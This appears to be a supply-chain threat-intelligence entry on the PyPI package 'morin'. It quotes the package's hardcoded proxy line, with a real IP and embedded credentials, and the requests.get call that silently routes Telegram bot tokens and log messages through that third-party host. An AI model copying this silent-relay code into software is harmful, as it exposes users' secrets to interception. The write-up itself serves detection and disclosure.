Supply-chain threat intelligence
Risk score: 92
Indexed incident for morin (pypi).
morin/common.py hardcodes an HTTP proxy at 191.102.147.15:8000 with embedded credentials (proxies = {'https': 'http://5TUMV6:sq3suS@191.102.147.15:8000'}) and unconditionally routes all Telegram API calls through it via requests.get(url, params=params, proxies=proxies, timeout=15) where url=https://api.telegram.org/bot{bot_token}/sendMessage.

Every Clickhouse/connector class in the package funnels through Common.log_func / Common.send_logs, so any caller using the package's notification feature ends up tunneling their Telegram bot_token (carried in the URL path) and log message content through this third-party host.

The proxy is not the publisher's documented infrastructure, is not mentioned in the package documentation, and the operator of 191.102.147.15:8000 can observe and tamper with the CONNECT-tunneled traffic — including capturing the bearer bot tokens. This is the silent-relay shape: a public API quietly redirects caller-supplied secrets through an attacker-or-third-party-controlled destination.